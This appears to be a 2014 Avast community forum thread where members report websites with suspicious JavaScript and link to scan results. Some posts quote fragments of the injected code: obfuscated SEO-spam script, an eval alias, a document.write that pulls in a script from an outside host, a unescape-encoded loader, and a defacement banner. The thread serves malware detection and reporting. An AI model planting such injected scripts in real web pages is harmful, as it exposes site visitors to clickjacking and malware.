Author Topic: Suspicious javascript or what?  (Read 4250 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34062
  • malware fighter
Suspicious javascript or what?
« on: June 16, 2014, 11:37:07 PM »
Javascript Check is found to be suspicious:
Suspicious

data[//><!-- window.jquery || document.write("<script src='/sites/all/modules/jquery_update/replace/jquery/1.7/jquery.js'>\x3c/script>") //--><!]]> </script> <script type="text/jav...
Sucuri"s does not detect: http://sitecheck.sucuri.net/results/twojruch.eu
XSS attack vulnerable site? Drupal version up to date: 7.28

polonus

P.S. For evaluation see: http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Ftwojruch.eu%2Fwiadomosci%2Frownosc%2Fbloginewsweekpl-atak-establishmentu-na-twoj-ruch-palikota&useragent=Fetch+useragent&accept_encoding=

External script link with suspicious web rep: https://www.mywot.com/en/scorecard/track.adform.net?utm_source=addon&utm_content=popup

D

« Last Edit: June 16, 2014, 11:43:06 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34062
  • malware fighter
Re: Suspicious javascript or what?
« Reply #1 on: June 17, 2014, 11:56:19 AM »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34062
  • malware fighter
Re: Suspicious javascript or what?
« Reply #2 on: June 17, 2014, 09:28:53 PM »
Flagged at Comodo's and Quttera's
http://app.webinspector.com/public/reports/22604437
&
http://quttera.com/detailed_report/nichesnowboards.com

Detected potentially suspicious initialization of function pointer to JavaScript method eval <code> __tmpvar749749895 = eval; <code/>

See here: htxp://aw-snap.info/articles/js-examples.php (broken for avast! flags site as with as
JS:Agent-KD[Trj]

Sucuri detects site as infested with SEO-Spam: http://sitecheck.sucuri.net/results/nichesnowboards.com

Known javascript malware. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}xViewState();

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34062
  • malware fighter
Re: Suspicious javascript or what?
« Reply #3 on: June 17, 2014, 10:00:36 PM »
Glad to be able to report to avast! community members that  the excellent avast! Web Shield detects and blocks the malcode on: htXps://nichesnowboards.com/ as JS:HideLink-A[Trj].
We are being protected, folks!  :)

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34062
  • malware fighter
Re: Suspicious javascript or what?
« Reply #4 on: June 17, 2014, 10:19:46 PM »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37699
Re: Suspicious javascript or what?
« Reply #5 on: June 17, 2014, 11:03:25 PM »
Glad to be able to report to avast! community members that  the excellent avast! Web Shield detects and blocks the malcode on: htXps://nichesnowboards.com/ as JS:HideLink-A[Trj].
We are being protected, folks!  :)

pol
VirusTotal
https://www.virustotal.com/en/file/98b86057499c53e8c057ba2b760d5efc3e03217d84ff8ed0a67e39a169725ff2/analysis/1403038946/


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34062
  • malware fighter
Re: Suspicious javascript or what?
« Reply #7 on: June 19, 2014, 02:36:41 PM »
Most scanners give this site  clean bill of health: http://zulu.zscaler.com/submission/show/563934b6ddc96f045625ebf47d84470e-1403180866
&
http://quttera.com/detailed_report/www.afdzal.net
&
http://urlquery.net/report.php?id=1403180114602
But we get suspicious iFrame check:
Suspicious

htxp://widget.stagram.com/follow/wan9571'
htxp://snapwidget.com/in/?u=d2fuotu3mxxpbnwxmdb8mnw0fhx5zxn8nxxub25l'

Included scripts check:Suspect - please check list for unknown includes


Suspicious Script:
   htxp://busuk.org/ping/widget/type3/1182050127/12
   document.write("<script type='text/javascript' src='htxp://ping.busuk.org/auto/verticalb.js?limit=12'></script>");

Sucuri's scan results seem to agree: http://sitecheck.sucuri.net/results/www.afdzal.net

avast Web Shield blocks as with JS:Clickjack-H[Trj], which equals TrojWare.JS.TrojanClicker.FbLiker.A.

polonus
« Last Edit: June 19, 2014, 02:40:12 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34062
  • malware fighter
Re: Suspicious javascript or what?
« Reply #9 on: June 19, 2014, 05:37:52 PM »
We thank Pondus for reporting undetected website: : wXw.wydawnictwoasp.pl
What's on?
Javascript Check:
Suspicious

<script language=javascript>document.write(unescape(\'%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61
Spam Check: Suspicion of Site-Wide Defacement

tional//en\"> <html> <title>hacked by phantomghost</title> <meta content=\"official member : 4prili666h05t - ./yupi d...

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34062
  • malware fighter
Re: Suspicious javascript or what?
« Reply #10 on: June 19, 2014, 07:39:32 PM »
What about this one: Suspicious on 001hao dot com

<div class="stat" ><script src="htxp://v1.cnzz.com/stat.php?id=3455938&web_id=3455938&show=pic" language="javascript" charset="gb2312"></sc 
See: https://www.mywot.com/en/scorecard/v1.cnzz.com?utm_source=addon&utm_content=popup

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!